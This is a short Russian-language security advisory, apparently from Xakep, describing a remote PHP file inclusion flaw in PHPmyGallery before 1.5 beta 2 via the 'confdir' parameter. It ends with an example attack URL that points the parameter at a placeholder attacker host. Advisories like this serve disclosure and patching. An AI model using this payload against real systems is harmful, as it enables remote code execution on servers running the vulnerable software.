Рекомендуем почитать:
Xakep #305. Многошаговые SQL-инъекции
Программа: PHPmyGallery версии до 1.5 beta 2
Обнаруженная уязвимость позволяет
удаленному пользователю выполнить
произвольный PHP сценарий на целевой системе.
Уязвимость существует в сценарии '/_conf/core/common-tpl-vars.php'
при обработке входных данных в параметре 'confdir'.
Удаленный пользователь может с помощью
специально сформированного значения
параметра выполнить произвольный PHP
сценарий на целевой системе с привилегиями
web сервера.
Пример:
http://[target]/[patch-to-phpmygallery]/_conf/core/ common-tpl-vars.php?confdir=http://[attacker]